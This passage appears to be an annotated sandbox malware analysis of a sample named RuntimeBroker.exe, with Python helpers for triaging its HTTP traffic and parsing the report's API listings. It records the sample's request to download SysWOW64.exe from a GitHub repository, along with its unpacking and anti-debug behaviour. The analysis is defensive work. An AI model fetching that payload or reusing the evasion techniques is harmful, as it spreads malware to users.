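    host = req_hdrs.get("host", "").lower()

    # Browsers and nearly all legitimate clients send a User-Agent.
    if method in ("GET", "POST") and "user-agent" not in req_hdrs:
        findings.append(("no-user-agent", f"{method} {target}"))

    filename = urlsplit(target).path.rsplit("/", 1)[-1]
    if filename.lower().endswith(EXECUTABLE_SUFFIXES):
        findings.append(("exe-download", filename))
    if host in RAW_CODE_HOSTS:
        findings.append(("code-hosting", host))

    status_line, resp_hdrs = parse_http_message(response)
    status = int(status_line.split(" ", 2)[1])
    if status in REDIRECT_CODES and "location" in resp_hdrs:
        loc = urlsplit(resp_hdrs["location"])
        if loc.hostname and loc.hostname != host:
            findings.append(("cross-host-redirect", loc.hostname))
            # If the redirect target was looked up in the same capture the
            # client most likely followed it; those addresses are the next hop.
            hits = sorted(a for n, a in dns_answers if n == loc.hostname)
            if hits:
                findings.append(("redirect-target-resolved", ",".join(hits)))

    # The Host header should name something that resolved to dst_ip here;
    # otherwise the client used a hard-coded address or resolved it elsewhere.
    if host not in {n for n, a in dns_answers if a == dst_ip}:
        findings.append(("unresolved-destination", dst_ip))
    return findings


# Constructed copies of the exchange printed above (response headers abbreviated).
REQUEST = (
    "GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1\r\n"
    "Host: github.com\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Date: Sat, 29 Mar 2025 13:00:37 GMT\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 0\r\n"
    "Location: https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
DNS_ANSWERS = [  # (name, A record) from the DNS answer table
    ("github.com", "140.82.114.4"),
    ("raw.githubusercontent.com", "185.199.108.133"),
    ("raw.githubusercontent.com", "185.199.109.133"),
    ("raw.githubusercontent.com", "185.199.111.133"),
    ("raw.githubusercontent.com", "185.199.110.133"),
]


def run_sample() -> list:
    return triage_exchange(REQUEST, RESPONSE, DNS_ANSWERS, "140.82.114.4")


if __name__ == "__main__":
    for tag, detail in run_sample():
        print(f"{tag:26s} {detail}")
```

The DNS correlation is the part worth keeping when this is turned into a detection: a GitHub raw download is common in legitimate tooling, but one made without a User-Agent by a process named after a Windows system binary, immediately followed by a connection to the redirect target, is a much narrower pattern.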


                                            [Charts not reproduced: two per-process timelines over the first 10 s of execution (one on a 0-100 scale, one in MB) and a behavior-distribution breakdown across File, Registry and Network events.]

                                            Target ID: 0
                                            Start time: 09:00:34
                                            Start date: 29/03/2025
                                            Path: C:\Users\user\Desktop\RuntimeBroker.exe
                                            Wow64 process (32bit): true
                                            Commandline: "C:\Users\user\Desktop\RuntimeBroker.exe"
                                            Imagebase: 0xbc0000
                                            File size: 79'392 bytes
                                            MD5 hash: 61FD0424631FC50F17989C516950935E
                                            Has elevated privileges: true
                                            Has administrator privileges: true
                                            Programmed in: C, C++ or other language
                                            Reputation: low
                                            Has exited: true
                                            Note: the sample ran from the user's Desktop as a 32-bit (WOW64) process with administrator rights. The genuine RuntimeBroker.exe is a Microsoft-signed binary in C:\Windows\System32, so a file of that name under a user profile is itself an indicator. The "Programmed in" line is the sandbox's heuristic; the import table and CLR header above identify the file as a .NET executable.

                                            Execution Graph
                                            Execution Coverage: 15.4%
                                            Dynamic/Decrypted Code Coverage: 100%
                                            Signature Coverage: 3.8%
                                            Total number of Nodes: 79
                                            Total number of Limit Nodes: 3
                                            API-calling paths in the execution graph below. Every address lies in the memory region dumped at 0x05840000, which the dump metadata marks as not backed by the PE file, i.e. code the sample unpacked or generated at run time (hence the 100% dynamic/decrypted code coverage):
                                            0x5848c06 -> 0x5848684 -> 0x5849630: CloseHandle
                                            0x584ef80 -> 0x584efc4: CheckRemoteDebuggerPresent
                                            0x584fad0 -> 0x584fb13: TerminateProcess
                                            0x5848d20 -> 0x5849615: CloseHandle; -> 0x584869c (wrapper for VirtualProtect at 0x58496d0), called repeatedly from its callees 0x584902c, 0x5849118, 0x5849498 and 0x584950d
                                            0x58411c8 -> 0x5841a68: VirtualProtect; -> 0x584081c / 0x584081d: VirtualProtect
                                            0x5842db8 -> 0x5842e6d / 0x5842e70 / 0x5842ea0 -> 0x5840c0c / 0x5844100: GetFileAttributesW
                                            The repeated VirtualProtect calls are the section-permission changes of the unpacking stage; CheckRemoteDebuggerPresent followed by TerminateProcess in a separate root is the anti-debug exit path. Raw graph data:
                                            execution_graph 9923 5848c06 9924 5848c0f 9923->9924 9927 5848684 9924->9927 9926 5848c9b 9928 5849630 CloseHandle 9927->9928 9930 584969e 9928->9930 9930->9926 9931 584ef80 9932 584efc4 CheckRemoteDebuggerPresent 9931->9932 9933 584f006 9932->9933 9949 584fad0 9950 584fb13 TerminateProcess 9949->9950 9951 584fb41 9950->9951 9952 5848d20 9953 5848d21 9952->9953 9954 5849615 CloseHandle 9953->9954 9955 5848df7 9953->9955 9969 584902c 9953->9969 9962 584969e 9954->9962 9964 5848eac 9955->9964 9983 584869c 9955->9983 9957 5848f3b 9960 584869c VirtualProtect 9957->9960 9963 5848f4e 9960->9963 9961 584869c VirtualProtect 9961->9964 9965 584869c VirtualProtect 9963->9965 9964->9957 9964->9961 9971 5848f74 9965->9971 9966 584869c VirtualProtect 9966->9964 9967 584869c VirtualProtect 9967->9969 9968 5849027 9969->9954 9969->9967 9973 5849118 9969->9973 9970 584869c VirtualProtect 9970->9971 9971->9968 9971->9970 9972 584869c VirtualProtect 9974 5849498 9972->9974 9973->9954 9975 58493c1 9973->9975 9977 584869c VirtualProtect 9973->9977 9974->9954 9979 584950d 9974->9979 9975->9954 9975->9972 9976 584869c VirtualProtect 9982 5849549 9976->9982 9978 5849373 9977->9978 9980 584869c VirtualProtect 9978->9980 9979->9976 9980->9975 9981 584869c VirtualProtect 9981->9982 9982->9968 9982->9981 9984 58496d0 VirtualProtect 9983->9984 9986 5848e5a 9984->9986 9986->9966 9934 58411c8 9937 58411c9 9934->9937 9935 5841a68 VirtualProtect 9936 5841aa2 9935->9936 9943 584195d 9937->9943 9945 584081c 9937->9945 9940 584081c VirtualProtect 9941 5841377 9940->9941 9942 584081c VirtualProtect 9941->9942 9941->9943 9942->9943 9943->9935 9944 584196e 9943->9944 9946 584081d VirtualProtect 9945->9946 9948 584134b 9946->9948 9948->9940 9987 5842db8 9988 5842db9 9987->9988 9991 5842e6d 9988->9991 9989 5842dc3 9992 5842e70 9991->9992 9996 5842e90 9992->9996 10004 5842ea0 9992->10004 9993 5842e79 9993->9989 9997 5842ea0 9996->9997 9999 58438b1 9997->9999 
10012 5840c0c 9997->10012 9999->9993 10000 5840c0c GetFileAttributesW 10001 5843869 10000->10001 10001->9999 10002 5840c0c GetFileAttributesW 10001->10002 10002->9999 10003 5843218 10003->9999 10003->10000 10005 5842ea1 10004->10005 10006 5840c0c GetFileAttributesW 10005->10006 10007 58438b1 10005->10007 10008 5843218 10006->10008 10007->9993 10008->10007 10009 5840c0c GetFileAttributesW 10008->10009 10010 5843869 10009->10010 10010->10007 10011 5840c0c GetFileAttributesW 10010->10011 10011->10007 10013 5844100 GetFileAttributesW 10012->10013 10015 584417f 10013->10015 10015->10003

                                            Executed Functions

                                            Control-flow Graph

                                            control_flow_graph 1810 58411c8-584120b 1815 584120d-5841214 1810->1815 1816 584122a-584122c 1810->1816 1817 5841a0a-5841aa0 VirtualProtect 1815->1817 1818 584121a-5841228 1815->1818 1819 584122f-584128b 1816->1819 1826 5841aa2-5841aa8 1817->1826 1827 5841aa9-5841aca 1817->1827 1818->1819 1819->1817 1829 5841291-58412b7 1819->1829 1826->1827 1829->1817 1832 58412bd-58412e3 1829->1832 1832->1817 1834 58412e9-5841307 1832->1834 1834->1817 1836 584130d-5841396 call 584081c * 2 1834->1836 1836->1817 1847 584139c-58413a8 1836->1847 1848 58414e5-58414f3 1847->1848 1849 58413ad-58413d6 1848->1849 1850 58414f9-5841528 1848->1850 1851 58413d8-58413e2 1849->1851 1852 5841429-5841436 1849->1852 1865 58415f4-5841600 1850->1865 1853 58413e4-58413f0 1851->1853 1854 58413f2-58413fb 1851->1854 1855 584143c-5841446 1852->1855 1856 58414de-58414e2 1852->1856 1858 58413fe-584140d 1853->1858 1854->1858 1859 5841456-584145f 1855->1859 1860 5841448-5841454 1855->1860 1856->1848 1861 5841416-5841419 1858->1861 1862 584140f-5841414 1858->1862 1863 5841462-5841478 1859->1863 1860->1863 1866 584141c-5841424 1861->1866 1862->1866 1867 58414d3-58414dc 1863->1867 1868 5841606-5841612 1865->1868 1869 584152d-584153e 1865->1869 1866->1856 1867->1856 1870 584147a-58414d2 1867->1870 1868->1817 1871 5841618-5841627 1868->1871 1869->1817 1872 5841544-5841565 1869->1872 1870->1867 1871->1817 1874 584162d-584164e 1871->1874 1872->1817 1875 584156b-58415f1 1872->1875 1874->1817 1876 5841654-5841660 1874->1876 1875->1865 1876->1817 1877 5841666-584167c 1876->1877 1877->1817 1878 5841682-584168e 1877->1878 1878->1817 1879 5841694-58416a9 1878->1879 1879->1817 1880 58416af-58416bb 1879->1880 1880->1817 1881 58416c1-58416d6 1880->1881 1881->1817 1882 58416dc-58416e8 1881->1882 1882->1817 1883 58416ee-5841704 1882->1883 1883->1817 1884 584170a-5841716 1883->1884 1884->1817 1885 584171c-5841731 1884->1885 1885->1817 1886 5841737-5841743 1885->1886 1886->1817 1887 
5841749-584176a 1886->1887 1887->1817 1888 5841770-584177c 1887->1888 1888->1817 1889 5841782-5841798 1888->1889 1889->1817 1890 584179e-58417aa 1889->1890 1890->1817 1891 58417b0-58417c5 1890->1891 1891->1817 1892 58417cb-58417d7 1891->1892 1892->1817 1893 58417dd-58417f2 1892->1893 1893->1817 1894 58417f8-5841804 1893->1894 1894->1817 1895 584180a-5841820 1894->1895 1895->1817 1896 5841826-5841832 1895->1896 1896->1817 1897 5841838-584184d 1896->1897 1897->1817 1898 5841853-584185f 1897->1898 1898->1817 1899 5841865-584187a 1898->1899 1899->1817 1900 5841880-584188c 1899->1900 1900->1817 1901 5841892-584189f 1900->1901 1901->1817 1902 58418a5-58418b1 1901->1902 1902->1817 1903 58418b7-58418c3 1902->1903 1903->1817 1904 58418c9-58418d5 1903->1904 1904->1817 1905 58418db-58418e7 1904->1905 1905->1817 1906 58418ed-58418f9 1905->1906 1906->1817 1907 58418ff-5841911 1906->1907 1907->1817 1908 5841917-5841939 1907->1908 1910 5841945-5841958 call 584081c 1908->1910 1911 584193b 1908->1911 1913 584195d-584196c 1910->1913 1911->1910 1914 584197d-5841985 1913->1914 1915 584196e-5841978 call 5840828 1913->1915 1916 58419dd-5841a00 1914->1916 1919 5841a02-5841a09 1915->1919 1918 5841987-5841995 1916->1918 1916->1919 1918->1817 1921 5841997-58419b4 1918->1921 1921->1817 1922 58419b6-58419d1 1921->1922 1922->1817 1923 58419d3-58419da 1922->1923 1923->1916
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: $@
                                            • API String ID: 544645111-1077428164
                                            • Opcode ID: 6beee2770e0c2f7fda3e595f6ccea652f3799a28a3bbf6ea9df7f18b3548c405
                                            • Instruction ID: b4200d73268ef6c76a5e9d2928f3130f247f4e1ef7e3f1ca17c5ff68c0046de6
                                            • Opcode Fuzzy Hash: 6beee2770e0c2f7fda3e595f6ccea652f3799a28a3bbf6ea9df7f18b3548c405
                                            • Instruction Fuzzy Hash: 5252A074E002598FCB24CF59C984B9EBBF2FF48310F5581A9E859AB261E734AD81CF51
                                            APIs
                                              • Part of subcall function 0584869C: VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            • CloseHandle.KERNEL32 ref: 0584968F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CloseHandleProtectVirtual
                                            • String ID: ntin$ue
                                            • API String ID: 3173283821-3378103365
                                            • Opcode ID: c372f886099f6e2004b97da7369f7364511561f64ef0d0c391bb03ef035ec42a
                                            • Instruction ID: 6ab462b0407e6909b7f4bcf9021d133316fbce17892b948aab006e527924a49c
                                            • Opcode Fuzzy Hash: c372f886099f6e2004b97da7369f7364511561f64ef0d0c391bb03ef035ec42a
                                            • Instruction Fuzzy Hash: 2D623D71A042298FDB24CFA9C880BAEBBF6BF44304F158099D949EB295E734DD81CF55

                                            Control-flow Graph

                                            control_flow_graph 3585 584ef80-584f004 CheckRemoteDebuggerPresent 3587 584f006-584f00c 3585->3587 3588 584f00d-584f041 3585->3588 3587->3588
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0584EFF7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 772cd0b09099efb513571a7078b29e55b3e3a22dbaef28c4b818f68364114364
                                            • Instruction ID: 282637eb83db56eb298e907ec9fabd688fce7a96f9ddfd6be95a6d64300718e6
                                            • Opcode Fuzzy Hash: 772cd0b09099efb513571a7078b29e55b3e3a22dbaef28c4b818f68364114364
                                            • Instruction Fuzzy Hash: 632125B1801259CFDB10CF9AD884BEEFBF8EF49320F14845AE955A3250D378A944CF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "vn
                                            • API String ID: 0-4119310160
                                            • Opcode ID: c54866b0b3a5f165147df4d89d6cc27c19fe0fec0d812ea91f1de4178e9fbaac
                                            • Instruction ID: e0c20fd97ac5c1a4d6893bdc39ac0ac21573bb4784d66805620f359dce30bc7c
                                            • Opcode Fuzzy Hash: c54866b0b3a5f165147df4d89d6cc27c19fe0fec0d812ea91f1de4178e9fbaac
                                            • Instruction Fuzzy Hash: 1FB1B130B142099FDB24DB74D854B6EBBB7FB88300F148069E906EB295DB799C45CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vln
                                            • API String ID: 0-2884392432
                                            • Opcode ID: d68ba0da712b2d39ac2abd70937f5481043730b9cd14f16f6e3be1b21e5dd8c0
                                            • Instruction ID: 7a643e8d4961bef327dcc1a9d52bbc02b3a7e0732bcdd79e05809f2b0ad2bce3
                                            • Opcode Fuzzy Hash: d68ba0da712b2d39ac2abd70937f5481043730b9cd14f16f6e3be1b21e5dd8c0
                                            • Instruction Fuzzy Hash: 43B12770E0021DCBDB10CFAAC8857AEBBF2BB89714F148129DC55EB294EB759845CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "vn
                                            • API String ID: 0-4119310160
                                            • Opcode ID: 5989db784af211dbace0e29e3e344cbc8248dfafea12ec22df92b1fdf8e59856
                                            • Instruction ID: 93b7e79e9c19fe9292e888d787c2fd6dd4e89c614da0eaa520ce8ee9978ec02c
                                            • Opcode Fuzzy Hash: 5989db784af211dbace0e29e3e344cbc8248dfafea12ec22df92b1fdf8e59856
                                            • Instruction Fuzzy Hash: 11A1A030B042099FDB24DB78D854B6EBBB6FB88300F548069E906EB294DF799C44CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \Vln
                                            • API String ID: 0-2884392432
                                            • Opcode ID: e10f59c8922505d045ddea2db966fa73499fb6b60745e347559d7cffed8aaaca
                                            • Instruction ID: d4df958f8127b4a1ea1a163c93e058c169b5e2d6c39e4f95fa8e131cacbea01b
                                            • Opcode Fuzzy Hash: e10f59c8922505d045ddea2db966fa73499fb6b60745e347559d7cffed8aaaca
                                            • Instruction Fuzzy Hash: 7F912970E0060D9FDB14CFAAC9857ADBBF2BB89314F248129EC15E7294EB749845CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d32d5caa4743838b3aad56c2d9fde3df0647bb41bac9041421c1b54a98362d3
                                            • Instruction ID: b35cfd3da1429d7561e0db50307a873e4a395bb0e6958d3724382b6821a06a2a
                                            • Opcode Fuzzy Hash: 2d32d5caa4743838b3aad56c2d9fde3df0647bb41bac9041421c1b54a98362d3
                                            • Instruction Fuzzy Hash: 8F72BF34A081199FCB14CBA9D4809BDFBF2FF84305F19856AE856DB256C634DD82CFA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b0eb7a15a38e74d65d1c60e120e45c9221dea26530dfcfce8dd0e2afc2036ad4
                                            • Instruction ID: f42a7830555fc1a0f4703bf010fe6316cfdb989446a7eba26211bc4d7485cd56
                                            • Opcode Fuzzy Hash: b0eb7a15a38e74d65d1c60e120e45c9221dea26530dfcfce8dd0e2afc2036ad4
                                            • Instruction Fuzzy Hash: F1E12736600210AFDB058FA4C954E6ABBB3FF8C714F0684E8E6095F272CA36DC55DB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35c88a97375312218930978b43f332ec04b5895c5acd57a48c4ee2a67e908a30
                                            • Instruction ID: e6aa321840b29e2b45813e858139d0f64691b69be2dc6158c4c94ceb17c4ae74
                                            • Opcode Fuzzy Hash: 35c88a97375312218930978b43f332ec04b5895c5acd57a48c4ee2a67e908a30
                                            • Instruction Fuzzy Hash: 9EE11636600210AFDB059FA4C954E6ABBB3FF8C714F1684E8E6095F271CA32DC55DB91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcd60470f9786441cce1ee71bd0d3653bbede405fa8d3f8007d4ab0dc4991c22
                                            • Instruction ID: 59128e67ab2a09b1b757d2a76c6c911eef75e0372b7a2ae9e99cd18a35aaeb7b
                                            • Opcode Fuzzy Hash: bcd60470f9786441cce1ee71bd0d3653bbede405fa8d3f8007d4ab0dc4991c22
                                            • Instruction Fuzzy Hash: 41B12670E0420D9BDB14CFA9C8857AEBBF2FB88314F148129DC15E7294EB74A846CF95

                                            Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the rendered graph is not preserved in the text export)
                                            • 3568: 58407ff-584081a -> 3571, 3572
                                            • 3571: 584081c -> 3572
                                            • 3572: 584081d-5841aa0, calls VirtualProtect -> 3575, 3576
                                            • 3575: 5841aa2-5841aa8 -> 3576
                                            • 3576: 5841aa9-5841aca
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 498f5acd6dce4bf4c4e270f771a09a518e68762078eca7d463492688b2ae8dd7
                                            • Instruction ID: 75b37d6d43187de002b060d3dd220d26e94aa363b722812f71cb2b11ca1dff08
                                            • Opcode Fuzzy Hash: 498f5acd6dce4bf4c4e270f771a09a518e68762078eca7d463492688b2ae8dd7
                                            • Instruction Fuzzy Hash: F2218C71D053598FCB00CFA9C444ADEBFF4EF48320F10806AE954A7201D3389945CFA0

                                            Control-flow Graph (basic blocks and edges)
                                            • 3578: 584ef79-584f004, calls CheckRemoteDebuggerPresent -> 3581, 3582
                                            • 3581: 584f006-584f00c -> 3582
                                            • 3582: 584f00d-584f041
                                            APIs
                                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0584EFF7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: CheckDebuggerPresentRemote
                                            • String ID:
                                            • API String ID: 3662101638-0
                                            • Opcode ID: 9952c5cd48d50202bb3a52b48b56ef92a3f09aa9985da0fc5cf5cbe46ca94d6f
                                            • Instruction ID: fc31181232999ec1f411f2f4b507b5ecca4bad510d75aa562c3b1d7456b1772e
                                            • Opcode Fuzzy Hash: 9952c5cd48d50202bb3a52b48b56ef92a3f09aa9985da0fc5cf5cbe46ca94d6f
                                            • Instruction Fuzzy Hash: E22136B18012598FCB10CF9AD884BEEFBF4AF48320F14855AE965B3290D3389944CF60
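                                            The `API.MODULE(args), ref:` lines, the `Source File:` lines and the one-line control-flow-graph exports in this listing are repetitive and hard to scan by eye. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It parses a handful of lines copied from the listing (embedded as constructed sample input), collapses repeated entries to unique call sites, keeps only the documented number of arguments for each API (VirtualProtect takes four, so the later values in the twelve-slot window are treated as stack residue rather than decoded, which is this example's reading of the listing), records which memory dumps are not backed by a PE image, and flags any API whose calling block has two successors in the control-flow graph, i.e. whose result is branched on, as the CheckRemoteDebuggerPresent block above is. The protection-constant table and API arities are the documented Windows values; the `is_triage_relevant` classification is the example's own.

```python
"""Triage helper for a Joe Sandbox function listing (added example, not part of
the report or of Joe Sandbox). Parses `API.MODULE(args), ref:` lines, `Source
File:` lines and the one-line `control_flow_graph` text export."""
import re

# Constructed sample: lines copied from the listing on this page (bullets kept).
SAMPLE = """\
• Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
control_flow_graph 3578 584ef79-584f004 CheckRemoteDebuggerPresent 3581 584f006-584f00c 3578->3581 3582 584f00d-584f041 3578->3582 3581->3582
• CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0584EFF7
• VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
• VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
• VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93
• TerminateProcess.KERNELBASE(?,00000008), ref: 0584FB32
• GetFileAttributesW.KERNEL32(00000000), ref: 05844170
"""

API_RE = re.compile(r"^\W*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(r"Source File:.*?Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)", re.I)
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

# Documented Windows page-protection constants (flNewProtect, 3rd VirtualProtect argument).
PROTECT_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# Documented parameter counts; slots beyond them are stack residue in the listing.
API_ARITY = {"VirtualProtect": 4, "CheckRemoteDebuggerPresent": 2, "TerminateProcess": 2,
             "GetFileAttributesW": 1, "CloseHandle": 1}


def parse_arg(tok):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)  # '?' = value not resolved by the sandbox


def parse_api_calls(text):
    """One dict per `API.MODULE(args), ref: ADDR` line, in listing order."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            api, module, args, ref = m.groups()
            calls.append({"api": api, "module": module, "ref": int(ref, 16),
                          "args": [parse_arg(a) for a in args.split(",")] if args else []})
    return calls


def parse_dump_sources(text):
    """{dump offset: backed by a PE image?} for every `Source File:` line."""
    return {int(m.group(1), 16): m.group(2).lower() == "true" for m in SRC_RE.finditer(text)}


def parse_cfg(line):
    """Parse one `control_flow_graph` export: <id> <start[-end]> [<API>] tokens
    interleaved with <a>-><b> edges. Node ids are decimal, addresses hex."""
    toks = line.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    blocks, edges, i = {}, [], 1
    while i < len(toks):
        e = EDGE_RE.match(toks[i])
        if e:
            edges.append((int(e.group(1)), int(e.group(2))))
            i += 1
            continue
        node = int(toks[i])
        lo, _, hi = toks[i + 1].partition("-")
        blocks[node] = [int(lo, 16), int(hi or lo, 16), None]
        i += 2
        if i < len(toks) and not EDGE_RE.match(toks[i]) and not toks[i].isdigit():
            blocks[node][2] = toks[i]  # API name attached to this block
            i += 1
    return {"blocks": {k: tuple(v) for k, v in blocks.items()}, "edges": edges}


def decode_protect(value):
    return "unresolved" if value is None else PROTECT_NAMES.get(value, hex(value))


def triage(text):
    """Unique call sites, decoded protections, unbacked dump regions, and APIs
    whose calling block has two successors (result is branched on)."""
    sites = {}
    for c in parse_api_calls(text):
        key = (c["api"], c["ref"])
        entry = sites.setdefault(key, {"module": c["module"], "count": 0,
                                       "args": c["args"][:API_ARITY.get(c["api"], len(c["args"]))]})
        entry["count"] += 1
    protections = {ref: decode_protect(s["args"][2]) for (api, ref), s in sites.items()
                   if api == "VirtualProtect" and len(s["args"]) > 2}
    unbacked = sorted(off for off, backed in parse_dump_sources(text).items() if not backed)
    branched = []
    for line in text.splitlines():
        if line.lstrip().startswith("control_flow_graph"):
            g = parse_cfg(line.strip())
            for node, (_, _, api) in g["blocks"].items():
                if api and len([b for a, b in g["edges"] if a == node]) == 2:
                    branched.append(api)
    return {"sites": sites, "protections": protections,
            "unbacked_regions": unbacked, "branches_on_api_result": branched}


if __name__ == "__main__":
    s = triage(SAMPLE)
    for (api, ref), site in s["sites"].items():
        print(f"{api}.{site['module']} @ {ref:08X}  listed {site['count']}x  args={site['args']}")
    print("VirtualProtect flNewProtect:", {f"{r:08X}": p for r, p in s["protections"].items()})
    print("dumps not backed by a PE image:", [f"{o:08X}" for o in s["unbacked_regions"]])
    print("API results branched on:", s["branches_on_api_result"])
```

                                            On the sample, both VirtualProtect sites come out as `unresolved` because the third slot is `?` in the listing; the `00000040` (PAGE_EXECUTE_READWRITE) in the twelfth slot is outside the four real parameters and is deliberately not decoded. To run it over the whole page, paste the listing into `SAMPLE` or read it from a file.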

                                            Control-flow Graph (basic blocks and edges)
                                            • 3591: 5848699-584869f -> 3592, 3593
                                            • 3592: 58486a1 -> 3593
                                            • 3593: 58486a2-5849750, calls VirtualProtect -> 3596, 3597
                                            • 3596: 5849752-5849758 -> 3597
                                            • 3597: 5849759-584977a
                                            APIs
                                            • VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: a2ec1e6ecdf95f5404d773a4f718f1cba7f75ad6d12934e4b42ad4ebbdb385cd
